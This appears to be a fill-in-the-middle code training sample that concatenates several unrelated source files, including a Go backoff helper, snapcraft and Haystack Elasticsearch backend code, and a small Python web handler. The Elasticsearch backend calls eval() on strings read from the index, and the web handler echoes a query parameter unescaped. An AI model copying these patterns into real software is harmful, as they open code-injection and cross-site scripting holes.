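// Hypothetical usage sketch (the retry loop, doRequest and maxRetries are
// illustrative, not part of this package):
//
//	b := NewExponentialBackoff(100*time.Millisecond, 10*time.Second, 2.0)
//	for retry := 1; retry <= maxRetries; retry++ {
//		if err := doRequest(); err == nil {
//			break
//		}
//		time.Sleep(b.Next(retry))
//	}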
type constantBackoff struct {
backoffInterval xtime.Duration
}
// NewConstantBackoff returns an instance of ConstantBackoff
func NewConstantBackoff(backoffInterval xtime.Duration) Backoff {
return &constantBackoff{backoffInterval: backoffInterval}
}
// Next returns next time for retrying operation with constant strategy
func (cb *constantBackoff) Next(retry int) time.Duration {
if retry <= 0 {
return 0 * time.Millisecond
}
	return time.Duration(cb.backoffInterval)
}
type exponentialBackoff struct {
exponentFactor float64
initialTimeout float64
maxTimeout float64
}
// NewExponentialBackoff returns an instance of ExponentialBackoff
func NewExponentialBackoff(initialTimeout, maxTimeout time.Duration, exponentFactor float64) Backoff {
return &exponentialBackoff{
exponentFactor: exponentFactor,
initialTimeout: float64(initialTimeout / time.Millisecond),<|fim▁hole|>
// Next returns next time for retrying operation with exponential strategy
func (eb *exponentialBackoff) Next(retry int) time.Duration {
if retry <= 0 {
return 0 * time.Millisecond
}
return time.Duration(math.Min(eb.initialTimeout+math.Pow(eb.exponentFactor, float64(retry)), eb.maxTimeout)) * time.Millisecond
}<|fim▁end|>
|
maxTimeout: float64(maxTimeout / time.Millisecond),
}
}
|
<|file_name|>_part_grammar_processor.py<|end_file_name|><|fim▁begin|># -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2017 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#<|fim▁hole|># along with this program. If not, see <http://www.gnu.org/licenses/>.
from typing import Any, Dict, Set
from snapcraft import project
from snapcraft.internal.project_loader import grammar
from snapcraft.internal import pluginhandler, repo
from ._package_transformer import package_transformer
class PartGrammarProcessor:
"""Process part properties that support grammar.
Stage packages example:
>>> from unittest import mock
>>> import snapcraft
>>> # Pretend that all packages are valid
>>> repo = mock.Mock()
>>> repo.is_valid.return_value = True
>>> plugin = mock.Mock()
>>> plugin.stage_packages = [{'try': ['foo']}]
>>> processor = PartGrammarProcessor(
... plugin=plugin,
... properties={},
... project=snapcraft.project.Project(),
... repo=repo)
>>> processor.get_stage_packages()
{'foo'}
Build packages example:
>>> from unittest import mock
>>> import snapcraft
>>> # Pretend that all packages are valid
>>> repo = mock.Mock()
>>> repo.is_valid.return_value = True
>>> plugin = mock.Mock()
>>> plugin.build_packages = [{'try': ['foo']}]
>>> processor = PartGrammarProcessor(
... plugin=plugin,
... properties={},
... project=snapcraft.project.Project(),
... repo=repo)
>>> processor.get_build_packages()
{'foo'}
Source example:
>>> from unittest import mock
>>> import snapcraft
>>> plugin = mock.Mock()
>>> plugin.properties = {'source': [{'on amd64': 'foo'}, 'else fail']}
>>> processor = PartGrammarProcessor(
... plugin=plugin,
... properties=plugin.properties,
... project=snapcraft.project.Project(),
... repo=None)
>>> processor.get_source()
'foo'
"""
def __init__(
self,
*,
plugin: pluginhandler.PluginHandler,
properties: Dict[str, Any],
project: project.Project,
repo: "repo.Ubuntu"
) -> None:
self._project = project
self._repo = repo
self._build_snap_grammar = getattr(plugin, "build_snaps", [])
self.__build_snaps = set() # type: Set[str]
self._build_package_grammar = getattr(plugin, "build_packages", [])
self.__build_packages = set() # type: Set[str]
self._stage_package_grammar = getattr(plugin, "stage_packages", [])
self.__stage_packages = set() # type: Set[str]
source_grammar = properties.get("source", [""])
if not isinstance(source_grammar, list):
self._source_grammar = [source_grammar]
else:
self._source_grammar = source_grammar
self.__source = ""
def get_source(self) -> str:
if not self.__source:
# The grammar is array-based, even though we only support a single
# source.
processor = grammar.GrammarProcessor(
self._source_grammar, self._project, lambda s: True
)
source_array = processor.process()
if len(source_array) > 0:
self.__source = source_array.pop()
return self.__source
def get_build_snaps(self) -> Set[str]:
if not self.__build_snaps:
processor = grammar.GrammarProcessor(
self._build_snap_grammar,
self._project,
repo.snaps.SnapPackage.is_valid_snap,
)
self.__build_snaps = processor.process()
return self.__build_snaps
def get_build_packages(self) -> Set[str]:
if not self.__build_packages:
processor = grammar.GrammarProcessor(
self._build_package_grammar,
self._project,
self._repo.build_package_is_valid,
transformer=package_transformer,
)
self.__build_packages = processor.process()
return self.__build_packages
def get_stage_packages(self) -> Set[str]:
if not self.__stage_packages:
processor = grammar.GrammarProcessor(
self._stage_package_grammar,
self._project,
self._repo.is_valid,
transformer=package_transformer,
)
self.__stage_packages = processor.process()
return self.__stage_packages<|fim▁end|>
|
# You should have received a copy of the GNU General Public License
|
<|file_name|>KonfigurationEventTest.java<|end_file_name|><|fim▁begin|><|fim▁hole|>import static java.time.LocalDateTime.now;
import static org.assertj.core.api.Assertions.assertThat;
public class KonfigurationEventTest {
@Test
public void test() {
KonfigurationEvent konfigurationEvent = new KonfigurationEvent(now(), now(), "@Konfiguration",
"Max:16\nMin: 4");
assertThat(konfigurationEvent.getMax()).isEqualTo(16);
assertThat(konfigurationEvent.getMin()).isEqualTo(4);
}
}<|fim▁end|>
|
package buchungstool.model.importer;
import org.junit.Test;
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup
setup(name='pyyaxml',
version='0.6.7',
description='Python API to Yandex.XML',
url='https://github.com/dbf256/py-ya-xml',
author='Alexey Moskvin',
author_email='dbf256@gmail.com',
license='MIT',
packages=['pyyaxml'],
install_requires=[<|fim▁hole|><|fim▁end|>
|
'six',
],
zip_safe=False)
|
<|file_name|>elasticsearch_backend.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals
import datetime
import re
import warnings
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.models.loading import get_model
from django.utils import six
import haystack
from haystack.backends import BaseEngine, BaseSearchBackend, BaseSearchQuery, log_query
from haystack.constants import ID, DJANGO_CT, DJANGO_ID, DEFAULT_OPERATOR
from haystack.exceptions import MissingDependency, MoreLikeThisError
from haystack.inputs import PythonData, Clean, Exact, Raw
from haystack.models import SearchResult
from haystack.utils import get_identifier
from haystack.utils import log as logging
try:
import requests
except ImportError:
raise MissingDependency("The 'elasticsearch' backend requires the installation of 'requests'.")
try:
import pyelasticsearch
except ImportError:
raise MissingDependency("The 'elasticsearch' backend requires the installation of 'pyelasticsearch'. Please refer to the documentation.")
DATETIME_REGEX = re.compile(
r'^(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})T'
r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})(\.\d+)?$')
class ElasticsearchSearchBackend(BaseSearchBackend):
# Word reserved by Elasticsearch for special use.
RESERVED_WORDS = (
'AND',
'NOT',
'OR',
'TO',
)
# Characters reserved by Elasticsearch for special use.
# The '\\' must come first, so as not to overwrite the other slash replacements.
RESERVED_CHARACTERS = (
'\\', '+', '-', '&&', '||', '!', '(', ')', '{', '}',
'[', ']', '^', '"', '~', '*', '?', ':', '/',
)
# Settings to add an n-gram & edge n-gram analyzer.
DEFAULT_SETTINGS = {
'settings': {
"analysis": {
"analyzer": {
"ngram_analyzer": {
"type": "custom",
"tokenizer": "lowercase",
"filter": ["haystack_ngram"]
},
"edgengram_analyzer": {
"type": "custom",
"tokenizer": "lowercase",
"filter": ["haystack_edgengram"]
}
},
"tokenizer": {
"haystack_ngram_tokenizer": {
"type": "nGram",
"min_gram": 3,<|fim▁hole|> "haystack_edgengram_tokenizer": {
"type": "edgeNGram",
"min_gram": 2,
"max_gram": 15,
"side": "front"
}
},
"filter": {
"haystack_ngram": {
"type": "nGram",
"min_gram": 3,
"max_gram": 15
},
"haystack_edgengram": {
"type": "edgeNGram",
"min_gram": 2,
"max_gram": 15
}
}
}
}
}
def __init__(self, connection_alias, **connection_options):
super(ElasticsearchSearchBackend, self).__init__(connection_alias, **connection_options)
        if 'URL' not in connection_options:
raise ImproperlyConfigured("You must specify a 'URL' in your settings for connection '%s'." % connection_alias)
        if 'INDEX_NAME' not in connection_options:
raise ImproperlyConfigured("You must specify a 'INDEX_NAME' in your settings for connection '%s'." % connection_alias)
self.conn = pyelasticsearch.ElasticSearch(connection_options['URL'], timeout=self.timeout)
self.index_name = connection_options['INDEX_NAME']
self.log = logging.getLogger('haystack')
self.setup_complete = False
self.existing_mapping = {}
def setup(self):
"""
Defers loading until needed.
"""
# Get the existing mapping & cache it. We'll compare it
# during the ``update`` & if it doesn't match, we'll put the new
# mapping.
try:
self.existing_mapping = self.conn.get_mapping(index=self.index_name)
except Exception:
if not self.silently_fail:
raise
unified_index = haystack.connections[self.connection_alias].get_unified_index()
self.content_field_name, field_mapping = self.build_schema(unified_index.all_searchfields())
current_mapping = {
'modelresult': {
'properties': field_mapping,
'_boost': {
'name': 'boost',
'null_value': 1.0
}
}
}
if current_mapping != self.existing_mapping:
try:
# Make sure the index is there first.
self.conn.create_index(self.index_name, self.DEFAULT_SETTINGS)
self.conn.put_mapping(self.index_name, 'modelresult', current_mapping)
self.existing_mapping = current_mapping
except Exception:
if not self.silently_fail:
raise
self.setup_complete = True
def update(self, index, iterable, commit=True):
if not self.setup_complete:
try:
self.setup()
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to add documents to Elasticsearch: %s", e)
return
prepped_docs = []
for obj in iterable:
try:
prepped_data = index.full_prepare(obj)
final_data = {}
# Convert the data to make sure it's happy.
for key, value in prepped_data.items():
final_data[key] = self._from_python(value)
prepped_docs.append(final_data)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
# We'll log the object identifier but won't include the actual object
# to avoid the possibility of that generating encoding errors while
# processing the log message:
self.log.error(u"%s while preparing object for update" % e.__class__.__name__, exc_info=True, extra={
"data": {
"index": index,
"object": get_identifier(obj)
}
})
self.conn.bulk_index(self.index_name, 'modelresult', prepped_docs, id_field=ID)
if commit:
self.conn.refresh(index=self.index_name)
def remove(self, obj_or_string, commit=True):
doc_id = get_identifier(obj_or_string)
if not self.setup_complete:
try:
self.setup()
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to remove document '%s' from Elasticsearch: %s", doc_id, e)
return
try:
self.conn.delete(self.index_name, 'modelresult', doc_id)
if commit:
self.conn.refresh(index=self.index_name)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to remove document '%s' from Elasticsearch: %s", doc_id, e)
def clear(self, models=[], commit=True):
# We actually don't want to do this here, as mappings could be
# very different.
# if not self.setup_complete:
# self.setup()
try:
if not models:
self.conn.delete_index(self.index_name)
else:
models_to_delete = []
for model in models:
models_to_delete.append("%s:%s.%s" % (DJANGO_CT, model._meta.app_label, model._meta.module_name))
                # Delete by query in Elasticsearch assumes you're dealing with
# a ``query`` root object. :/
query = {'query_string': {'query': " OR ".join(models_to_delete)}}
self.conn.delete_by_query(self.index_name, 'modelresult', query)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
if len(models):
self.log.error("Failed to clear Elasticsearch index of models '%s': %s", ','.join(models_to_delete), e)
else:
self.log.error("Failed to clear Elasticsearch index: %s", e)
def build_search_kwargs(self, query_string, sort_by=None, start_offset=0, end_offset=None,
fields='', highlight=False, facets=None,
date_facets=None, query_facets=None,
narrow_queries=None, spelling_query=None,
within=None, dwithin=None, distance_point=None,
models=None, limit_to_registered_models=None,
result_class=None):
index = haystack.connections[self.connection_alias].get_unified_index()
content_field = index.document_field
if query_string == '*:*':
kwargs = {
'query': {
'filtered': {
'query': {
"match_all": {}
},
},
},
}
else:
kwargs = {
'query': {
'filtered': {
'query': {
'query_string': {
'default_field': content_field,
'default_operator': DEFAULT_OPERATOR,
'query': query_string,
'analyze_wildcard': True,
'auto_generate_phrase_queries': True,
},
},
},
},
}
if fields:
if isinstance(fields, (list, set)):
fields = " ".join(fields)
kwargs['fields'] = fields
if sort_by is not None:
order_list = []
for field, direction in sort_by:
if field == 'distance' and distance_point:
# Do the geo-enabled sort.
lng, lat = distance_point['point'].get_coords()
sort_kwargs = {
"_geo_distance": {
distance_point['field']: [lng, lat],
"order": direction,
"unit": "km"
}
}
else:
if field == 'distance':
warnings.warn("In order to sort by distance, you must call the '.distance(...)' method.")
# Regular sorting.
sort_kwargs = {field: {'order': direction}}
order_list.append(sort_kwargs)
kwargs['sort'] = order_list
# From/size offsets don't seem to work right in Elasticsearch's DSL. :/
# if start_offset is not None:
# kwargs['from'] = start_offset
# if end_offset is not None:
# kwargs['size'] = end_offset - start_offset
if highlight is True:
kwargs['highlight'] = {
'fields': {
content_field: {'store': 'yes'},
}
}
if self.include_spelling:
kwargs['suggest'] = {
'suggest': {
'text': spelling_query or query_string,
'term': {
# Using content_field here will result in suggestions of stemmed words.
'field': '_all',
},
},
}
if narrow_queries is None:
narrow_queries = set()
if facets is not None:
kwargs.setdefault('facets', {})
for facet_fieldname, extra_options in facets.items():
facet_options = {
'terms': {
'field': facet_fieldname,
'size': 100,
},
}
# Special cases for options applied at the facet level (not the terms level).
if extra_options.pop('global_scope', False):
# Renamed "global_scope" since "global" is a python keyword.
facet_options['global'] = True
if 'facet_filter' in extra_options:
facet_options['facet_filter'] = extra_options.pop('facet_filter')
facet_options['terms'].update(extra_options)
kwargs['facets'][facet_fieldname] = facet_options
if date_facets is not None:
kwargs.setdefault('facets', {})
for facet_fieldname, value in date_facets.items():
# Need to detect on gap_by & only add amount if it's more than one.
interval = value.get('gap_by').lower()
# Need to detect on amount (can't be applied on months or years).
                if value.get('gap_amount', 1) != 1 and interval not in ('month', 'year'):
# Just the first character is valid for use.
interval = "%s%s" % (value['gap_amount'], interval[:1])
kwargs['facets'][facet_fieldname] = {
'date_histogram': {
'field': facet_fieldname,
'interval': interval,
},
'facet_filter': {
"range": {
facet_fieldname: {
'from': self._from_python(value.get('start_date')),
'to': self._from_python(value.get('end_date')),
}
}
}
}
if query_facets is not None:
kwargs.setdefault('facets', {})
for facet_fieldname, value in query_facets:
kwargs['facets'][facet_fieldname] = {
'query': {
'query_string': {
'query': value,
}
},
}
if limit_to_registered_models is None:
limit_to_registered_models = getattr(settings, 'HAYSTACK_LIMIT_TO_REGISTERED_MODELS', True)
if models and len(models):
model_choices = sorted(['%s.%s' % (model._meta.app_label, model._meta.module_name) for model in models])
elif limit_to_registered_models:
# Using narrow queries, limit the results to only models handled
# with the current routers.
model_choices = self.build_models_list()
else:
model_choices = []
if len(model_choices) > 0:
if narrow_queries is None:
narrow_queries = set()
narrow_queries.add('%s:(%s)' % (DJANGO_CT, ' OR '.join(model_choices)))
if narrow_queries:
kwargs['query'].setdefault('filtered', {})
kwargs['query']['filtered'].setdefault('filter', {})
kwargs['query']['filtered']['filter'] = {
'fquery': {
'query': {
'query_string': {
'query': u' AND '.join(list(narrow_queries)),
},
},
'_cache': True,
}
}
if within is not None:
from haystack.utils.geo import generate_bounding_box
((min_lat, min_lng), (max_lat, max_lng)) = generate_bounding_box(within['point_1'], within['point_2'])
within_filter = {
"geo_bounding_box": {
within['field']: {
"top_left": {
"lat": max_lat,
"lon": min_lng
},
"bottom_right": {
"lat": min_lat,
"lon": max_lng
}
}
},
}
kwargs['query'].setdefault('filtered', {})
kwargs['query']['filtered'].setdefault('filter', {})
if kwargs['query']['filtered']['filter']:
compound_filter = {
"and": [
kwargs['query']['filtered']['filter'],
within_filter,
]
}
kwargs['query']['filtered']['filter'] = compound_filter
else:
kwargs['query']['filtered']['filter'] = within_filter
if dwithin is not None:
lng, lat = dwithin['point'].get_coords()
dwithin_filter = {
"geo_distance": {
"distance": dwithin['distance'].km,
dwithin['field']: {
"lat": lat,
"lon": lng
}
}
}
kwargs['query'].setdefault('filtered', {})
kwargs['query']['filtered'].setdefault('filter', {})
if kwargs['query']['filtered']['filter']:
compound_filter = {
"and": [
kwargs['query']['filtered']['filter'],
dwithin_filter
]
}
kwargs['query']['filtered']['filter'] = compound_filter
else:
kwargs['query']['filtered']['filter'] = dwithin_filter
# Remove the "filtered" key if we're not filtering. Otherwise,
# Elasticsearch will blow up.
if not kwargs['query']['filtered'].get('filter'):
kwargs['query'] = kwargs['query']['filtered']['query']
return kwargs
@log_query
def search(self, query_string, **kwargs):
if len(query_string) == 0:
return {
'results': [],
'hits': 0,
}
if not self.setup_complete:
self.setup()
search_kwargs = self.build_search_kwargs(query_string, **kwargs)
search_kwargs['from'] = kwargs.get('start_offset', 0)
order_fields = set()
for order in search_kwargs.get('sort', []):
for key in order.keys():
order_fields.add(key)
geo_sort = '_geo_distance' in order_fields
end_offset = kwargs.get('end_offset')
start_offset = kwargs.get('start_offset', 0)
if end_offset is not None and end_offset > start_offset:
search_kwargs['size'] = end_offset - start_offset
try:
raw_results = self.conn.search(search_kwargs,
index=self.index_name,
doc_type='modelresult')
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to query Elasticsearch using '%s': %s", query_string, e)
raw_results = {}
return self._process_results(raw_results,
highlight=kwargs.get('highlight'),
result_class=kwargs.get('result_class', SearchResult),
distance_point=kwargs.get('distance_point'), geo_sort=geo_sort)
def more_like_this(self, model_instance, additional_query_string=None,
start_offset=0, end_offset=None, models=None,
limit_to_registered_models=None, result_class=None, **kwargs):
from haystack import connections
if not self.setup_complete:
self.setup()
# Deferred models will have a different class ("RealClass_Deferred_fieldname")
# which won't be in our registry:
model_klass = model_instance._meta.concrete_model
index = connections[self.connection_alias].get_unified_index().get_index(model_klass)
field_name = index.get_content_field()
params = {}
if start_offset is not None:
params['search_from'] = start_offset
if end_offset is not None:
params['search_size'] = end_offset - start_offset
doc_id = get_identifier(model_instance)
try:
raw_results = self.conn.more_like_this(self.index_name, 'modelresult', doc_id, [field_name], **params)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to fetch More Like This from Elasticsearch for document '%s': %s", doc_id, e)
raw_results = {}
return self._process_results(raw_results, result_class=result_class)
def _process_results(self, raw_results, highlight=False,
result_class=None, distance_point=None,
geo_sort=False):
from haystack import connections
results = []
hits = raw_results.get('hits', {}).get('total', 0)
facets = {}
spelling_suggestion = None
if result_class is None:
result_class = SearchResult
if self.include_spelling and 'suggest' in raw_results:
raw_suggest = raw_results['suggest']['suggest']
spelling_suggestion = ' '.join([word['text'] if len(word['options']) == 0 else word['options'][0]['text'] for word in raw_suggest])
if 'facets' in raw_results:
facets = {
'fields': {},
'dates': {},
'queries': {},
}
for facet_fieldname, facet_info in raw_results['facets'].items():
if facet_info.get('_type', 'terms') == 'terms':
facets['fields'][facet_fieldname] = [(individual['term'], individual['count']) for individual in facet_info['terms']]
elif facet_info.get('_type', 'terms') == 'date_histogram':
# Elasticsearch provides UTC timestamps with an extra three
# decimals of precision, which datetime barfs on.
facets['dates'][facet_fieldname] = [(datetime.datetime.utcfromtimestamp(individual['time'] / 1000), individual['count']) for individual in facet_info['entries']]
elif facet_info.get('_type', 'terms') == 'query':
facets['queries'][facet_fieldname] = facet_info['count']
unified_index = connections[self.connection_alias].get_unified_index()
indexed_models = unified_index.get_indexed_models()
content_field = unified_index.document_field
for raw_result in raw_results.get('hits', {}).get('hits', []):
source = raw_result['_source']
app_label, model_name = source[DJANGO_CT].split('.')
additional_fields = {}
model = get_model(app_label, model_name)
if model and model in indexed_models:
for key, value in source.items():
index = unified_index.get_index(model)
string_key = str(key)
if string_key in index.fields and hasattr(index.fields[string_key], 'convert'):
additional_fields[string_key] = index.fields[string_key].convert(value)
else:
additional_fields[string_key] = self._to_python(value)
del(additional_fields[DJANGO_CT])
del(additional_fields[DJANGO_ID])
if 'highlight' in raw_result:
additional_fields['highlighted'] = raw_result['highlight'].get(content_field, '')
if distance_point:
additional_fields['_point_of_origin'] = distance_point
if geo_sort and raw_result.get('sort'):
from haystack.utils.geo import Distance
additional_fields['_distance'] = Distance(km=float(raw_result['sort'][0]))
else:
additional_fields['_distance'] = None
result = result_class(app_label, model_name, source[DJANGO_ID], raw_result['_score'], **additional_fields)
results.append(result)
else:
hits -= 1
return {
'results': results,
'hits': hits,
'facets': facets,
'spelling_suggestion': spelling_suggestion,
}
def build_schema(self, fields):
content_field_name = ''
mapping = {}
for field_name, field_class in fields.items():
field_mapping = {
'boost': field_class.boost,
'index': 'analyzed',
'store': 'yes',
'type': 'string',
}
if field_class.document is True:
content_field_name = field_class.index_fieldname
# DRL_FIXME: Perhaps move to something where, if none of these
# checks succeed, call a custom method on the form that
# returns, per-backend, the right type of storage?
if field_class.field_type in ['date', 'datetime']:
field_mapping['type'] = 'date'
elif field_class.field_type == 'integer':
field_mapping['type'] = 'long'
elif field_class.field_type == 'float':
field_mapping['type'] = 'float'
elif field_class.field_type == 'boolean':
field_mapping['type'] = 'boolean'
elif field_class.field_type == 'ngram':
field_mapping['analyzer'] = "ngram_analyzer"
elif field_class.field_type == 'edge_ngram':
field_mapping['analyzer'] = "edgengram_analyzer"
elif field_class.field_type == 'location':
field_mapping['type'] = 'geo_point'
# The docs claim nothing is needed for multivalue...
# if field_class.is_multivalued:
# field_data['multi_valued'] = 'true'
if field_class.stored is False:
field_mapping['store'] = 'no'
# Do this last to override `text` fields.
if field_class.indexed is False or hasattr(field_class, 'facet_for'):
field_mapping['index'] = 'not_analyzed'
if field_mapping['type'] == 'string' and field_class.indexed:
field_mapping["term_vector"] = "with_positions_offsets"
                if not hasattr(field_class, 'facet_for') and field_class.field_type not in ('ngram', 'edge_ngram'):
field_mapping["analyzer"] = "snowball"
mapping[field_class.index_fieldname] = field_mapping
return (content_field_name, mapping)
def _iso_datetime(self, value):
"""
If value appears to be something datetime-like, return it in ISO format.
Otherwise, return None.
"""
if hasattr(value, 'strftime'):
if hasattr(value, 'hour'):
return value.isoformat()
else:
return '%sT00:00:00' % value.isoformat()
def _from_python(self, value):
"""Convert more Python data types to ES-understandable JSON."""
iso = self._iso_datetime(value)
if iso:
return iso
elif isinstance(value, six.binary_type):
# TODO: Be stricter.
return six.text_type(value, errors='replace')
elif isinstance(value, set):
return list(value)
return value
def _to_python(self, value):
"""Convert values from ElasticSearch to native Python values."""
if isinstance(value, (int, float, complex, list, tuple, bool)):
return value
if isinstance(value, six.string_types):
possible_datetime = DATETIME_REGEX.search(value)
if possible_datetime:
date_values = possible_datetime.groupdict()
for dk, dv in date_values.items():
date_values[dk] = int(dv)
return datetime.datetime(
date_values['year'], date_values['month'],
date_values['day'], date_values['hour'],
date_values['minute'], date_values['second'])
try:
# This is slightly gross but it's hard to tell otherwise what the
# string's original type might have been. Be careful who you trust.
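            # (If the indexed values could come from an untrusted source,
            # ast.literal_eval would be a safer drop-in here for the literal
            # types handled below, at the cost of rejecting expressions.)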
converted_value = eval(value)
# Try to handle most built-in types.
if isinstance(
converted_value,
(int, list, tuple, set, dict, float, complex)):
return converted_value
except Exception:
# If it fails (SyntaxError or its ilk) or we don't trust it,
# continue on.
pass
return value
# Sucks that this is almost an exact copy of what's in the Solr backend,
# but we can't import due to dependencies.
class ElasticsearchSearchQuery(BaseSearchQuery):
def matching_all_fragment(self):
return '*:*'
def add_spatial(self, lat, lon, sfield, distance, filter='bbox'):
"""Adds spatial query parameters to search query"""
kwargs = {
'lat': lat,
            'long': lon,
'sfield': sfield,
'distance': distance,
}
self.spatial_query.update(kwargs)
def add_order_by_distance(self, lat, long, sfield):
"""Orders the search result by distance from point."""
kwargs = {
'lat': lat,
'long': long,
'sfield': sfield,
}
self.order_by_distance.update(kwargs)
def build_query_fragment(self, field, filter_type, value):
from haystack import connections
query_frag = ''
if not hasattr(value, 'input_type_name'):
# Handle when we've got a ``ValuesListQuerySet``...
if hasattr(value, 'values_list'):
value = list(value)
if isinstance(value, six.string_types):
# It's not an ``InputType``. Assume ``Clean``.
value = Clean(value)
else:
value = PythonData(value)
# Prepare the query using the InputType.
prepared_value = value.prepare(self)
if not isinstance(prepared_value, (set, list, tuple)):
# Then convert whatever we get back to what pysolr wants if needed.
prepared_value = self.backend._from_python(prepared_value)
# 'content' is a special reserved word, much like 'pk' in
# Django's ORM layer. It indicates 'no special field'.
if field == 'content':
index_fieldname = ''
else:
index_fieldname = u'%s:' % connections[self._using].get_unified_index().get_index_fieldname(field)
filter_types = {
'contains': u'%s',
'startswith': u'%s*',
'exact': u'%s',
'gt': u'{%s TO *}',
'gte': u'[%s TO *]',
'lt': u'{* TO %s}',
'lte': u'[* TO %s]',
}
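        # Illustrative example: a 'gte' filter on a `pub_date` field renders as
        # [2010-01-01T00:00:00 TO *] and is prefixed with "pub_date:" at the
        # return statement below.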
if value.post_process is False:
query_frag = prepared_value
else:
if filter_type in ['contains', 'startswith']:
if value.input_type_name == 'exact':
query_frag = prepared_value
else:
                    # Iterate over terms & incorporate the converted form of each into the query.
terms = []
if isinstance(prepared_value, six.string_types):
for possible_value in prepared_value.split(' '):
terms.append(filter_types[filter_type] % self.backend._from_python(possible_value))
else:
terms.append(filter_types[filter_type] % self.backend._from_python(prepared_value))
if len(terms) == 1:
query_frag = terms[0]
else:
query_frag = u"(%s)" % " AND ".join(terms)
elif filter_type == 'in':
in_options = []
for possible_value in prepared_value:
in_options.append(u'"%s"' % self.backend._from_python(possible_value))
query_frag = u"(%s)" % " OR ".join(in_options)
elif filter_type == 'range':
start = self.backend._from_python(prepared_value[0])
end = self.backend._from_python(prepared_value[1])
query_frag = u'["%s" TO "%s"]' % (start, end)
elif filter_type == 'exact':
if value.input_type_name == 'exact':
query_frag = prepared_value
else:
prepared_value = Exact(prepared_value).prepare(self)
query_frag = filter_types[filter_type] % prepared_value
else:
if value.input_type_name != 'exact':
prepared_value = Exact(prepared_value).prepare(self)
query_frag = filter_types[filter_type] % prepared_value
if len(query_frag) and not isinstance(value, Raw):
if not query_frag.startswith('(') and not query_frag.endswith(')'):
query_frag = "(%s)" % query_frag
return u"%s%s" % (index_fieldname, query_frag)
def build_alt_parser_query(self, parser_name, query_string='', **kwargs):
if query_string:
kwargs['v'] = query_string
kwarg_bits = []
for key in sorted(kwargs.keys()):
if isinstance(kwargs[key], six.string_types) and ' ' in kwargs[key]:
kwarg_bits.append(u"%s='%s'" % (key, kwargs[key]))
else:
kwarg_bits.append(u"%s=%s" % (key, kwargs[key]))
return u"{!%s %s}" % (parser_name, ' '.join(kwarg_bits))
def build_params(self, spelling_query=None, **kwargs):
search_kwargs = {
'start_offset': self.start_offset,
'result_class': self.result_class
}
order_by_list = None
if self.order_by:
if order_by_list is None:
order_by_list = []
for field in self.order_by:
direction = 'asc'
if field.startswith('-'):
direction = 'desc'
field = field[1:]
order_by_list.append((field, direction))
search_kwargs['sort_by'] = order_by_list
if self.date_facets:
search_kwargs['date_facets'] = self.date_facets
if self.distance_point:
search_kwargs['distance_point'] = self.distance_point
if self.dwithin:
search_kwargs['dwithin'] = self.dwithin
if self.end_offset is not None:
search_kwargs['end_offset'] = self.end_offset
if self.facets:
search_kwargs['facets'] = self.facets
if self.fields:
search_kwargs['fields'] = self.fields
if self.highlight:
search_kwargs['highlight'] = self.highlight
if self.models:
search_kwargs['models'] = self.models
if self.narrow_queries:
search_kwargs['narrow_queries'] = self.narrow_queries
if self.query_facets:
search_kwargs['query_facets'] = self.query_facets
if self.within:
search_kwargs['within'] = self.within
if spelling_query:
search_kwargs['spelling_query'] = spelling_query
return search_kwargs
def run(self, spelling_query=None, **kwargs):
"""Builds and executes the query. Returns a list of search results."""
final_query = self.build_query()
search_kwargs = self.build_params(spelling_query, **kwargs)
results = self.backend.search(final_query, **search_kwargs)
self._results = results.get('results', [])
self._hit_count = results.get('hits', 0)
self._facet_counts = self.post_process_facets(results)
self._spelling_suggestion = results.get('spelling_suggestion', None)
def run_mlt(self, **kwargs):
"""Builds and executes the query. Returns a list of search results."""
if self._more_like_this is False or self._mlt_instance is None:
raise MoreLikeThisError("No instance was provided to determine 'More Like This' results.")
additional_query_string = self.build_query()
search_kwargs = {
'start_offset': self.start_offset,
'result_class': self.result_class,
'models': self.models
}
if self.end_offset is not None:
search_kwargs['end_offset'] = self.end_offset - self.start_offset
results = self.backend.more_like_this(self._mlt_instance, additional_query_string, **search_kwargs)
self._results = results.get('results', [])
self._hit_count = results.get('hits', 0)
class ElasticsearchSearchEngine(BaseEngine):
backend = ElasticsearchSearchBackend
query = ElasticsearchSearchQuery<|fim▁end|>
|
"max_gram": 15,
},
|
<|file_name|>test.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from wrapper import get, run
import logging
import requests
@get('/')
def f(*args, **kwargs):
return '<html><head></head><body><h1>Hello!</h1></body></html>'
@get('/test', ['php'])
def test_f(*args, **kwargs):
arguments = kwargs['arguments']
php = arguments['php'][0]
self = args[0]
self.write("Head")
return 'Test{}'.format(php)
def test():
run(8888)
def main():
pass
if __name__ == '__main__':
test()<|fim▁end|>
| |
<|file_name|>limits.rs<|end_file_name|><|fim▁begin|>use crate::error::Result;
use postgres::Connection;
use std::collections::BTreeMap;
use std::time::Duration;
#[derive(Debug, Clone, PartialEq, Eq)]
pub(crate) struct Limits {
memory: usize,
targets: usize,
timeout: Duration,
networking: bool,
max_log_size: usize,
}
impl Default for Limits {
fn default() -> Self {
Self {
memory: 3 * 1024 * 1024 * 1024, // 3 GB
timeout: Duration::from_secs(15 * 60), // 15 minutes
targets: 10,
networking: false,
max_log_size: 100 * 1024, // 100 KB
}
}
}
impl Limits {
pub(crate) fn for_crate(conn: &Connection, name: &str) -> Result<Self> {
